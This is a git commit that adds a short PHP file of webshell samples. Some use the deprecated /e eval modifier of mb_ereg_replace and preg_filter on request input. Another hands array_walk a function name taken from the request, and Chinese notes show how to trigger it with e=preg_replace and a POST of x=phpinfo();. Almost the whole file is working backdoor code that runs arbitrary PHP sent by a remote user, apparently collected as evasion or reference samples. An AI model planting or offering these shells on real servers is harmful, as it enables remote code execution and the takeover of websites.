Create 2020.08.20.14.php

2025-12-06 04:41:28 +00:00 · 2020-08-20 12:40:40 +08:00
parent 44282fe412
commit 6a9169da6b
1 changed files with 28 additions and 0 deletions
--- a/php/2020.08.20.14.php
+++ b/php/2020.08.20.14.php
@@ -0,0 +1,28 @@
+<?php 
+    mb_ereg_replace('\d', $_REQUEST['x'], '1', 'e');
+?>
+
+<?php 
+    preg_filter('|\d|e', $_REQUEST['x'], '2');
+?>
+
+use like:
+
+```
+
+<?php 
+  $e = $_REQUEST['e'];
+  $arr = array($_POST['x'] => '|.*|e',);
+    array_walk($arr, $e, '');
+?>
+此时提交如下 payload 的话：
+
+Php
+shell.php?e=preg_replace
+最后就相当于执行了如下语句：
+
+Php
+preg_replace('|.*|e',$_POST['x'],'')
+这个时候只需要 POST x=phpinfo();
+
+```